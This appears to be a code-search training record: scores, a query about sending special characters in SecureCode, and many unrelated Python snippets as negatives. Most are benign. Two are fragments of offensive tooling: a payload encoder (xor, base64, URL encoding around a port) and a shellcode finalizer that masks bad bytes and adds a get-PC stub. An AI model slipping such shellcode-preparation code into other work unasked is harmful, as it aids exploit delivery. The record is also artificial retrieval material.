Optional[pulumi.Input['FlowDestinationFlowConfigDestinationConnectorPropertiesHoneycodeArgs']]:\n return pulumi.get(self, \"honeycode\")", "def create_code_without_password(self, phone):\r\n code = self.random_code(settings.CODE_LENGTH)\r\n # if phone in [\"+77753721232\", \"+77752470125\", \"+77074443333\"]:\r\n # code = \"4512\"\r\n # else:\r\n # code = \"%0.4d\" % random.randint(0, 9999)\r\n # mobizonproxy.send_sms(phone, text=u\"{} - Код активации для Pillowz365\".format(code))\r\n activation = Activation(phone=phone,\r\n to_reset=False,\r\n password=make_password(code),\r\n code=code)\r\n activation.save()\r\n return activation", "def ocsp_no_check(self, value):\n\n if value is None:\n self._ocsp_no_check = None\n else:\n self._ocsp_no_check = bool(value)", "def test_script_to_fs_empty_code():\n result = uflash.script_to_fs('', uflash._MICROBIT_ID_V1)\n assert result == ''", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def enable_null_tracking(*args, **kwargs): # real signature unknown\n pass", "def get_prep_value(self, value):\n if value is not None:\n return 'base64:' + base64.encodestring(json.dumps(value))", "def _send_code(self, phone, code, case):\n raise NotImplementedError", "def nullValueToZero(self) -> None:\n self.cpp.nullValueToZero()", "def test_none(self):\n self.assertEqual(b\"\", self.successResultOf(to_xml(None)))", "def none_to_empty(data):\n return data if data is not None else ''", "def get(self):\r\n self.code = self.code.replace(\"PORT\", str(self.port))\r\n\r\n # Apply xor encoding.\r\n self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply base64 encoding.\r\n 
self.code = base64_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply url-encoding\r\n if self.args.urlencode is True:\r\n self.code = to_urlencode(self.code)\r\n \r\n return self.code", "def null_enabled(self):\n return False", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def honeycode(self) -> Optional[pulumi.Input['ConnectorProfileConnectorProfileConfigConnectorProfileCredentialsHoneycodeArgs']]:\n return pulumi.get(self, \"honeycode\")", "def test_default_missing_honor(self):\r\n self.url_params['honor_code'] = ''\r\n response = self.client.post(self.url, self.url_params)\r\n self.assertEqual(response.status_code, 400)\r\n obj = json.loads(response.content)\r\n self.assertEqual(\r\n obj['value'],\r\n u'To enroll, you must follow the honor code.',\r\n )", "def _set_None(self):\n\n self.description = None\n self.func = None", "def 
__call__(self, value):\n value = str(value).strip()\n\n if len(value) == 0:\n pass\n\n else:\n super().__call__(value)", "def test_empty_value(self):\n avp_val = avp.AVP(0)\n self.assertEqual(avp_val.value, None)\n self.assertEqual(avp_val.payload, None)\n\n # We can then set its value\n avp_val.value = b''\n self.assertEqual(avp_val.value, b'')\n self.assertEqual(avp_val.payload, b'')\n\n # And unset it again\n avp_val.value = None\n self.assertEqual(avp_val.value, None)\n self.assertEqual(avp_val.payload, None)", "def _deserialize_null(self, *args):\n return None", "def _encode_nullable(data_type, obj, alias_validators, old_style, for_msgpack):\n if obj is not None:\n return _json_compat_obj_encode_helper(\n data_type.validator, obj, alias_validators, old_style, for_msgpack)\n else:\n return None", "def testEncodeEmpty(self):\n empty_case = ''\n encoded_result = ASCIITransportFormat.encode_data(empty_case)\n self.assertEqual(encoded_result, empty_case)", "def string(self, value):\n # respect {None}\n if value is None:\n # by leaving it alone\n return None\n # my value knows\n return str(value)", "def data():\n return None", "def secret() -> None:\n pass", "def __init__(__self__, *,\n code: Optional[pulumi.Input[str]] = None,\n message: Optional[pulumi.Input[str]] = None):\n if code is not None:\n pulumi.set(__self__, \"code\", code)\n if message is not None:\n pulumi.set(__self__, \"message\", message)", "def honeycode(self) -> Optional[pulumi.Input['ConnectorProfileConnectorProfileConfigConnectorProfilePropertiesHoneycodeArgs']]:\n return pulumi.get(self, \"honeycode\")", "async def code(self) -> str:\n if self.shared_secret:\n return generate_one_time_code(self.shared_secret)\n print(\"Please enter a Steam guard code\")\n code = await utils.ainput(\">>> \")\n return code.strip()", "def test_optional_honor(self):\r\n self.url_params['honor_code'] = ''\r\n response = self.client.post(self.url, self.url_params)\r\n self.assertEqual(response.status_code, 200)\r\n obj = json.loads(response.content)\r\n self.assertEqual(obj['success'], True)", "def test_key_none(self):\n try:\n AlphaVantage()\n self.fail(msg='A None api key must raise an error')\n except ValueError:\n self.assertTrue(True)", "def test_key_none(self):\n try:\n AlphaVantage()\n self.fail(msg='A None api key must raise an error')\n except ValueError:\n self.assertTrue(True)", "def null_check(cur,code,table,passvalue):\n cur.execute(code)\n result = cur.fetchall()[0][0]\n if result == passvalue:\n print(f\"Data Quality check passed. {table} doesn't have any null values.\")\n else:\n print(f\"Data quality check failed. 
{table} has null values.\")", "def form_InputNoneValue(request):\n schema = schemaish.Structure()\n schema.add('inputStrip', schemaish.String(default=''))\n\n form = formish.Form(schema, 'form')\n form['inputStrip'].widget = formish.Input(strip=True, none_value='BANG')\n return form", "def _sanitize(opt, value):\n return value if not opt.secret else '*' * 4", "def null(self):\n val = self.read(4)\n if val != b'null':\n self.on_parser_error(\"null token expected\")\n return null", "def _encode_supplement(self):", "def _encode_supplement(self):", "def sid_string(self) -> Optional[str]:\n return None", "def setNoCheckout(self) -> None:\n ...", "def empty_signature():\n return bytes(0)", "def changenonetoNone(s):\r\n if s=='None':\r\n return None\r\n else:\r\n return s", "def setUpFormData(self):\n super(NoCAS, self).setUpFormData()\n self.formData['CAS_ID'] = ''", "def xen_api_success_void():\n return xen_api_success(\"\")", "def mock_valid_data_without_security_code():\n return {\n \"CreditCardNumber\": \"123454567890123456\",\n \"CardHolder\": \"Test Name\",\n \"ExpirationDate\":\n (dt.datetime.now() + dt.timedelta(hours=1)).isoformat(),\n \"Amount\": 100\n }", "def nasm_null_safe_mutable_data_finalizer(env, code, data):\n\n if data or env.buffers:\n # Determine length of nullify + shellcode and adjust data pointer\n xor_offsets = []\n masked_data = OrderedDict()\n\n for datum, (offset, orig_datum) in six.iteritems(data):\n xor_offsets.extend([\n offset + i\n for i, b in enumerate(six.iterbytes(datum))\n if b in (0, 10, 13)\n ])\n\n masked_datum = b''.join([\n six.int2byte(b) if b not in (0, 10, 13)\n else six.int2byte(b ^ 0xff)\n for b in six.iterbytes(datum)\n ])\n masked_data[masked_datum] = (offset, orig_datum)\n\n if xor_offsets:\n # Build code to restore NUL, \\r and \\n\n temp_reg = env.TEMP_REG[env.target.bits]\n null_code = env.reg_load(env.BL, 255) + \\\n env.reg_load(temp_reg, env.OFFSET_REG)\n\n last_offset = 0\n for offset in xor_offsets:\n offset -= last_offset\n null_code.extend(\n env.reg_add(temp_reg, offset) +\n ['xor [%s], bl' % temp_reg]\n )\n last_offset += offset\n code = ['\\t%s' % line for line in null_code] + code\n data = masked_data\n\n code_len = len(asm('\\n'.join(code), target=env.target))\n adjust_ebp = env.reg_add(env.OFFSET_REG, code_len)\n\n return [\n '\\tjmp __getpc1',\n '__getpc0:',\n '\\tpop %s' % env.OFFSET_REG,\n ] + [\n '\\t%s' % line for line in adjust_ebp\n ] + [\n '\\tjmp __realstart',\n '__getpc1:',\n '\\tcall __getpc0',\n '__realstart:',\n ] + code + _pack_data(data)\n else:\n return code", "def sendOTP(code):\n # Modify the code here to change from print to any output \n print(\"Your OTP is \" + code + \". 
Kindly do not share it with anyone\")", "def getStrNo(self, key):\n value = self.getConf(key);\n if value == \"no\":\n return None\n else:\n return value", "def test_neg_operate_key_is_none(self):\n llist = [{\"op\": aerospike.OPERATOR_PREPEND, \"bin\": \"name\", \"val\": \"ram\"}]\n try:\n self.as_connection.operate(None, llist)\n\n except e.ParamError as exception:\n assert exception.code == -2", "def sendingString(self):\n return ''", "def generate_challenge(self):\n return None", "def test_none_hash(self):\n get_string = self.reverse_hash.get_string(None)\n self.assertEqual(get_string['error'], 'hash value passed is None')", "def _get_blank_value_18(field):\n if field.null:\n return None\n else:\n return field.value_to_string(None)", "def test_valid_null(self):\n f = lws.valid_null\n assert f(None, '') is True\n assert f('asdasdasd', '') is True" ]
[ "0.5724641", "0.56951576", "0.5571913", "0.55152303", "0.5499936", "0.54701316", "0.5447195", "0.5409918", "0.5399865", "0.5353087", "0.530565", "0.52624655", "0.5250316", "0.5222344", "0.52218187", "0.5196473", "0.51829845", "0.51713824", "0.5162897", "0.5159124", "0.5156829", "0.5152702", "0.51484877", "0.51170504", "0.51170504", "0.51170504", "0.50967187", "0.5095255", "0.5085713", "0.50845057", "0.506819", "0.5066156", "0.50619614", "0.50595015", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50338197", "0.50308627", "0.5003807", "0.50037485", "0.49810973", "0.4980796", "0.4958856", "0.4955526", "0.49413982", "0.49404982", "0.49274534", "0.49164343", "0.4916264", "0.49081695", "0.4907163", "0.48964772", "0.48964182", "0.48964182", "0.4889248", "0.48891222", "0.48875037", "0.4881175", "0.48811433", "0.48811433", "0.487922", "0.48761952", "0.48741212", "0.48638368", "0.48573396", "0.48565912", "0.4855255", "0.4851683", "0.48461485", "0.48449984", "0.48447424", "0.48428094", "0.48284918", "0.48140672", "0.48115084", "0.4808443" ]
0.0
-1
Send special characters in SecureCode
def test_35(self): assert 'False' == Api.requestBlock('test-35')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def encode(self, text):", "def encode_data ( data ) :\n firstpass = base64.b64encode( data )\n cipher = get_cipher( firstpass )\n\n index = 0\n datalen = len( firstpass )\n encoded_data = []\n while index < datalen :\n if index % 2 == 0 :\n encoded_data.append( chr( ord( firstpass[ index ] ) + cipher ) )\n else :\n encoded_data.append( chr( ord( firstpass[ index ] ) - cipher ) )\n index += 1\n\n encoded_data[ 0 ] = firstpass[ 0 ]\n encoded_data[ -1 ] = firstpass[ -1 ]\n encoded_data[ -2 ] = firstpass[ -2 ]\n return ''.join( encoded_data )", "def cryptate(self):\r\n\r\n intab1 = \"abcdefghijklomnopqrstuvwxyz\"\r\n outtab1 = \"?2p=o)7i(u9/y&t3%r¤5e#w1q!>)\"\r\n# Fetching the writing in textbox\r\n s = self.textbox.toPlainText()\r\n a = s.lower()\r\n# The crypting process, replaces letters in intab1 with outtab1\r\n crypted = (a.translate({ord(x): y for (x, y) in zip(intab1, outtab1)}))\r\n# Clear the textbox\r\n self.textbox.clear()\r\n# Write the crypted text within textbox\r\n self.textbox.setPlainText(crypted)", "def send_to_c2(msg: str) -> str:\n msg_as_ord = [ord(c) for c in msg]\n msg_encrypted = crypt1(msg_as_ord)\n resp = requests.post(C2_URL, data=str(msg_encrypted))\n if resp.status_code != 200:\n print('Got status code', resp.status_code)\n return None\n\n raw_resp = resp._content.decode('utf-8')\n encrypted_list = eval(raw_resp)\n decrypted_list = crypt1(encrypted_list)\n return ''.join([chr(i) for i in decrypted_list])", "def escape(self,s):\n\t\ts = s.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')\n\t\ts = s.replace('\"','').replace(\"'\",\"\")\n\t\treturn ''.join([c for c in s if ord(c) > 0x1F])", "def sendkey_escape(string):\r\n return re.sub(r'([+^%~{}\\[\\]()])', r'{\\1}', string)", "def sendsafe(self, data):\n\n import base64\n\n data = base64.b85encode(self.as_bytes(data))\n return self.sendraw(data)", "def sendOTP(code):\n # Modify the code here to change from print to any output \n print(\"Your OTP is \" + code + \". 
Kindly do not share it with anyone\")", "def send_string(self, code_num, msg):\n self.client.send(f\"{code_num}_{msg}\".encode())", "def escapeEncode(s: unicode) -> unicode:\n ...", "def test_specialchar(self):\n form_data = self.form_data('vNzwXpzKJyTshvHsuULn')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def post_key(self):\n # print(self.key)\n #Sending the key to the attacker.\n s.send(bytes(\"K\\n{}\".format(str(self.key,'utf-8')),'utf-8'))", "def test_submithint_escape(self):\r\n mock_module = CHModuleFactory.create()\r\n json_in = {'answer': '29.0', 'hint': '<script> alert(\"Trololo\"); </script>'}\r\n mock_module.submit_hint(json_in)\r\n self.assertTrue(mock_module.hints['29.0']['0'][0] == u'&lt;script&gt; alert(&quot;Trololo&quot;); &lt;/script&gt;')", "def secret_char(c):\n return \"\\\\raisebox{{0.07ex}}{{{}}}\".format(c)", "def sendToClient(plaintext):\n signature = userKeys.signUsingPrivateKey(plaintext)\n encryptedText = userKeys.encrypt(plaintext, contactKey)\n s.send(encryptedText)\n time.sleep(1)\n s.send(signature)", "def encrypt_string(self, raw_string):\n return self.fernet_instance.encrypt(raw_string.encode('utf-8'))", "def non_secret_char(c):\n return c", "def encode_parameters(self, text):\n return quote_plus(text, safe='=:&\"')", "def encode(self, data):\n return self.__cipher.encrypt(data.encode('utf-8'))", "def encrypt(strings):\r\n rd = ''.join(random.sample(upperchr+lowcarsechr+otherchr+numchr,10))\r\n output = base64.encodestring(strings+mselment+rd)\r\n print output", "def _encode_partitial_parameter(data):\n return base64.b64encode(data.encode(\"utf-8\")).decode()", "def doEncode(self):\n raise CipherError(\"override this func and return the encoded msg\")", "async def encode(ctx, text: Option(str, \"Text to encode in brainfuck\")):\n encoded = bot.brainfuck.encode(text)\n await send_code(ctx, encoded.code, lang=\"bf\")", "def _encode_supplement(self):", "def _encode_supplement(self):", "def _escape(msg):\n reserved = bytearray('\\x7E\\x7D\\x11\\x13'.encode())\n escaped = bytearray()\n escaped.append(msg[0])\n\n for byte in msg[1:]:\n\n if byte in reserved:\n escaped.append(0x7D)\n escaped.append(byte ^ 0x20)\n else:\n escaped.append(byte)\n\n return escaped", "def encode_text():\n print(f\"{YELLOW}[{MIDDLE_DOT}]{RESET} Enter message to encode: \", end=\"\")\n message = input()\n encoded = LEFT_TO_RIGHT_MARK\n for message_char in message:\n code = '{0}{1}'.format('0' * padding, int(str(to_base(\n ord(message_char), len(zero_space_symbols)))))\n code = code[len(code) - padding:]\n for code_char in code:\n index = int(code_char)\n encoded = encoded + zero_space_symbols[index]\n\n encoded += RIGHT_TO_LEFT_MARK\n\n pyperclip.copy(encoded)\n print(f\"{GREEN}[+]{RESET} Encoded message copied to clipboard. 
{GREEN}[+]{RESET}\")", "def entry(from_code, key):\n # turn code to hexadecimal\n from_code = DC.uniToHex(from_code)\n\n en = DESEncode()\n string_len = len(from_code)\n\n if string_len < 1:\n print 'error input'\n return False\n key_code = en.encode(from_code, key, string_len)\n return key_code", "def setCharacterCode(code='STANDARD'):\n dislin.chacod(code)", "def main():\n key, plain = get_key_plain()\n encode(key, plain)", "def operate_cipher(self):", "def encode(self, strs):", "def encode(self, strs):", "def test_value_special_chars(self):\n raw = [\n 0x48,\n 0x65,\n 0x79,\n 0x21,\n 0x3F,\n 0x24,\n 0x20,\n 0xC4,\n 0xD6,\n 0xDC,\n 0xE4,\n 0xF6,\n 0xFC,\n 0xDF,\n ]\n string = \"Hey!?$ ÄÖÜäöüß\"\n self.assertEqual(DPTString.to_knx(string), raw)\n self.assertEqual(DPTString.from_knx(raw), string)", "def de_cryptate(self):\r\n\r\n intab1 = \"abcdefghijklomnopqrstuvwxyz !,.\"\r\n outtab1 = \"?2p=o)7i(u9/y&t3%r¤5e#w1q!>*'^;)\"\r\n# Fetching from written in textbox\r\n s = self.textbox.toPlainText()\r\n a = s.lower()\r\n# Changing out the letters/numbers/etc\r\n crypted = (a.translate({ord(x): y for (y, x) in zip(intab1, outtab1)}))\r\n# Clear the textbox\r\n self.textbox.clear()\r\n# Write the Decrypted text\r\n self.textbox.setPlainText(crypted)", "def _send(self, data):\n self._sock.send(self._cipher_tx.crypt(data))", "def _url_base64_encode(msg):\r\n msg_base64 = base64.b64encode(msg)\r\n msg_base64 = msg_base64.replace('+', '-')\r\n msg_base64 = msg_base64.replace('=', '_')\r\n msg_base64 = msg_base64.replace('/', '~')\r\n return msg_base64", "def test_post_special_characters(self):\n self.is_authenticated()\n response = self.post_special_characters()\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(response.data[\"error\"], \"You cannot post special characters\")", "def encode(plain):\n # Remove whitespace and punctionation\n encoded = remove_punctuation(plain.lower())\n encoded = remove_whitespace(encoded)\n \n # Add space after every 5 characters\n encoded = add_space(encoded, 5)\n \n # Use the cipher translation\n encoded = encoded.translate(cipher)\n \n return encoded", "def test_escape(self):\n bad_str = '''`~!@#$%^&*()_+-={}[]|\\\\;:'\",./<>?\\n\\r\\t '''\n self.run_escape_case(bad_str)", "def _applyCipher(self, encode):\n pass", "def weaksauce_encrypt(text, password):\n\n offset = sum([ord(x) for x in password])\n encoded = ''.join(\n chr(min(ord(x) + offset, 2**20))\n for x in text\n )\n return encoded", "def encode_email(email, key):\n return", "def escape_character_in_string(self, a, text):\n logging.debug(\"in escape character \" + text)\n #self.just_read_char()\n self.read_char()\n self.produce(STRING, text)", "def encode(self, decoded):", "def caesar_encode(self, text, key):\n result_list = []\n for char in text:\n if char.isalpha():\n if char.islower():\n offset = ASCII_LOWER_OFFSET\n else:\n offset = ASCII_UPPER_OFFSET\n char = chr((ord(char) - offset + key) % ALPHABET_SIZE + offset)\n result_list.append(char)\n return ''.join(result_list)", "async def password_generate_complex(self, ctx):\n await ctx.send(\n \"\".join(\n random.choice(string.ascii_letters[:94]) for i in range(random.randint(20, 35))\n )\n )", "def publickey_unsafe(sk: bytes) -> bytes:\n h = H(sk)\n a = decodecoord(h)\n A = scalarmult_B(a)\n return encodepoint(A)", "def recode_for_write(sec):\n sec2 = []\n for i in sec:\n sec2.append(i.decode('utf-8').encode('cp1251'))\n# sec2.append(i.encode('cp1251'))\n return sec2", "def test_special_characters(self):\n testString 
= sanitize('[-;]\\`{\\}')\n self.assertEqual(testString, '_________')", "def encrypt(self,string=\"vrorqjdqgwdqnviruwkhilvk\",key=3):\r\n return \"\".join([chr((ord(ch)-key-ord('a'))%(ord('z')-ord('a')+1)+ord('a')) for ch in string])", "def send_auth_code(phone: str):\n\n # Replace with credentials from your Twilio account\n account_sid = \"ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\n auth_token = \"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\n client = Client(account_sid, auth_token)\n\n # secrets uses the most secure RNG available to the OS\n code = f'{secrets.randbelow(1000000):06}'\n\n # send SMS containing the code\n try:\n client.messages.create(\n to=f'+1{phone}',\n from_='+1XXXXXXXXXX',\n body=f'Your SecureLogin verification code is {code}')\n except TwilioRestException:\n return None\n else:\n return code", "def display_content(com,message):\n #message = message.encode('utf-8')\n #message = message.decode('ascii', 'ignore')\n safeMsg = filter(lambda x: x in string.printable, message)\n safeMsg = safeMsg.replace('\\n', ' ')\n print \"ALPHA: \", safeMsg\n try:\n #com = serial.Serial(config.devalpha, 9600, timeout=3)\n #com.close()\n #com.open()\n comstr = config.alpha['display'] + safeMsg + config.alpha['eot']\n com.write(comstr)\n #com.close()\n except serial.SerialException as e:\n logging.warning(\"Serial exception: \"+str(e))", "async def code(self) -> str:\n if self.shared_secret:\n return generate_one_time_code(self.shared_secret)\n print(\"Please enter a Steam guard code\")\n code = await utils.ainput(\">>> \")\n return code.strip()", "def _encode_code(self, text):\r\n replacements = [\r\n # Encode all ampersands; HTML entities are not\r\n # entities within a Markdown code span.\r\n ('&', '&amp;'),\r\n # Do the angle bracket song and dance:\r\n ('<', '&lt;'),\r\n ('>', '&gt;'),\r\n ]\r\n for before, after in replacements:\r\n text = text.replace(before, after)\r\n hashed = _hash_text(text)\r\n self._escape_table[text] = hashed\r\n return hashed", "def _safe_key(self, key):\n if isinstance(key, str):\n key = key.encode('UTF-8')\n return key", "def test_sendUnicodeCommand(self):\n self.p.sendCommand(\"CMD\", (\"param\\u00b9\", \"param\\u00b2\"))\n self.check(b\"CMD param\\xc2\\xb9 param\\xc2\\xb2\\r\\n\")", "def create_secret_code():\n characters = string.ascii_uppercase + string.digits\n size = 6\n return ''.join(random.choice(characters) for _ in range(size))", "def encrypt(data, key):\n data = six.ensure_binary(data)\n data = privy.hide(secret=data, password=key)\n data = six.ensure_text(data)\n return data", "def encryptionSelfMadeFunction(text,index):\n s = text\n transformedChar = \"\"\n\n transformedChar = s[0:index] + s[index+1:] +s[index]\n\n print(\"Encrypted Transformed text : \" )\n return transformedChar", "def escape(self):\n pass", "def encrypted(data: str) -> str:\n return b64encode(data.encode('ascii')).decode('ascii')", "def encrypt_data_key(self, dataKey, token, userGroup):\n masterKey = self.retrieve_master_key(token=token, userGroup=userGroup)\n box = secret.SecretBox(masterKey)\n if isinstance(dataKey, str):\n dataKey = dataKey.encode('utf-8')\n cipherText= box.encrypt(dataKey).decode('cp855')\n return cipherText", "def test_encode(self):\n assert url_encoder.encode(1) == 'TheStakeOut'\n assert url_encoder.encode(800) == 'TheStockTip-TheSeven'\n assert url_encoder.encode(99999) == 'MaleUnbonding-TheConversion-TheAndreaDoria'", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n 
return False\n\n return True", "def encode_string(self, value, double=False):\n\n # Replace special characters in string using the %xx escape\n encoded_str = quote(value, '')\n if double: # double encode\n encoded_str = quote(encoded_str, '')\n\n return encoded_str", "def ciphertext(self, be_secure=True):\n if be_secure and not self.__is_obfuscated:\n self.obfuscate()\n\n return self.__ciphertext", "def write_string(self, s: str) -> None:\n encoded_key = s.encode(\"ascii\")\n self.write_int32(len(encoded_key))\n self.buffer += encoded_key", "def encryptstring(text, password):\n\n enc = []\n for i in enumerate(text):\n key_c = password[i[0] % len(password)]\n enc_c = chr((ord(i[1]) + ord(key_c)) % 256)\n enc.append(enc_c)\n return base64.urlsafe_b64encode(\"\".join(enc).encode()).decode()", "def encrypt(self, str_msg):\n msg = str_msg.encode('utf-8')\n if self.security_type == gss.RequirementFlag.integrity:\n return gss.wrap(self.ctx, msg, False, None)[0]\n elif self.security_type == gss.RequirementFlag.confidentiality:\n res, used = gss.wrap(self.ctx, msg, True, None)\n if not used:\n raise GSSClientError('User requested encryption, '\n 'but it was not used!')\n return res\n else:\n return msg", "def encipher(self):\n ciphertext = \"\"\n for pt, key_char in zip(self.text, self.key):\n char_index = self.char_block.alphabet.index(pt)\n ciphertext += self.char_block.rows[key_char][char_index]\n print(ciphertext)", "def hack_message(self):\r\n\t\t#Will not let user input useless messages that cannot be hacked.\r\n\t\twhile True:\r\n\t\t\tself.message = input(\"Please enter a message you would like to hack. --> \")\r\n\t\t\tif self.message != \"\" and len(self.message) > 4:\r\n\t\t\t\tbreak\t\t\t\r\n\t\tmax_key = len(self.message)\r\n\t\tself.i = 1\r\n\t\tpotential_hits = []\r\n\t\t#Runs through all potential keys. 
\r\n\t\tfor self.i in range(1, max_key):\r\n\t\t\tprint(f\"Trying key #{self.i}\")\t\t\t\r\n\t\t\tself.my_code = Decryptor(self.message, self.i).transfer_decrypt()\r\n\t\t\tself.hack_plausible = False\r\n\t\t\tself.verify_hack_key()\r\n\t\t\tif self.hack_plausible:\r\n\t\t\t\tpotential_hits.append(f\"Key #{self.i} yeilded {self.percent_english}% english words after decryption.\\n\" + \"\\t\" + self.my_code[:50])\r\n\t\tprint(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\")\r\n\t\tprint(\"Hacking results:\\n\")\r\n\t\tfor hit in potential_hits:\r\n\t\t\tprint(\"\\t\" + hit + \"|\\n\")", "def encodeText(text):\r\n#\treturn repr( quote_plus(text.replace(\"'\", '\"')) )\r\n\ttry:\r\n\t\treturn repr( quote_plus(text.replace(\"'\", '\"').encode('utf-8')) )\r\n\texcept:\r\n\t\tlogError(\"encodeText()\")\r\n\treturn repr(text.replace(\"'\", '\"'))", "def encode_kiss(self):\n enc_frame = ''.join([\n self.destination.encode_kiss(),\n self.source.encode_kiss(),\n ''.join([path_call.encode_kiss() for path_call in self.path])\n ])\n return ''.join([\n enc_frame[:-1],\n chr(ord(enc_frame[-1]) | 0x01),\n kiss.SLOT_TIME,\n chr(0xF0),\n self.text\n ])", "def get(self):\r\n self.code = self.code.replace(\"PORT\", str(self.port))\r\n\r\n # Apply xor encoding.\r\n self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply base64 encoding.\r\n self.code = base64_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply url-encoding\r\n if self.args.urlencode is True:\r\n self.code = to_urlencode(self.code)\r\n \r\n return self.code", "def adobe_base64_encode(cls, to_encode):\n if isinstance(to_encode, unicode):\n to_encode = to_encode.encode(\"utf8\")\n encoded = base64.encodestring(to_encode)\n return encoded.replace(b\"+\", b\":\").replace(b\"/\", b\";\").replace(b\"=\", b\"@\").strip()", "def encript(self): \n if (len(sys.argv) == Cconfiguration_caesar.DUAL_PARAMETER) and (int(sys.argv[Cconfiguration_caesar.INCREMENTAL_PARAMETER])>=Cconfiguration_caesar.INITIAL_INT_PARAMETER):\n result = \"\"\n k = int(sys.argv[Cconfiguration_caesar.INCREMENTAL_PARAMETER])\n plaintext = input(\"plaintext: \")\n for i in range(len(plaintext)):\n char = plaintext[i]\n if ((Cconfiguration_caesar.ALPHABET_LOWER_INDEX>ord(char)) or (Cconfiguration_caesar.ALPHABET_LOWER_LIMIT<ord(char))) and ((Cconfiguration_caesar.ALPHABET_UPPER_INDEX>ord(char)) or (Cconfiguration_caesar.ALPHABET_UPPER_LIMIT<ord(char))):\n result += char\n elif (char.isupper()):\n result += chr((ord(char) + k-Cconfiguration_caesar.ALPHABET_UPPER_INDEX) % Cconfiguration_caesar.ALPHABET_LIMIT + Cconfiguration_caesar.ALPHABET_UPPER_INDEX)\n else:\n result += chr((ord(char) + k - Cconfiguration_caesar.ALPHABET_LOWER_INDEX) % Cconfiguration_caesar.ALPHABET_LIMIT + Cconfiguration_caesar.ALPHABET_LOWER_INDEX)\n print(f\"ciphertext: {result}\")\n else:\n print(CextraStatusDefinition.COMMAND_LINE_EERROR)\n exit(Cconfiguration_caesar.INCREMENTAL_PARAMETER)", "def code_challenge(verifier):\n digest = hashlib.sha256(verifier).digest()\n return base64.urlsafe_b64encode(digest).rstrip(b'=')", "def encrypt_and_encode(data, key):\r\n return base64.urlsafe_b64encode(aes_encrypt(data, key))", "def encrypt():\n\tnull = 0", "def encodeVigenere(self, key):\n\n key = key.upper().replace(\" \", \"\")\n encode = Vig(key)\n cipherText = encode.encode(self.planeText)\n \n if (self.verbose == 1):\n print(cipherText)\n \n return(cipherText)", "def encrypt(text):\r\n\r\n cipher = 
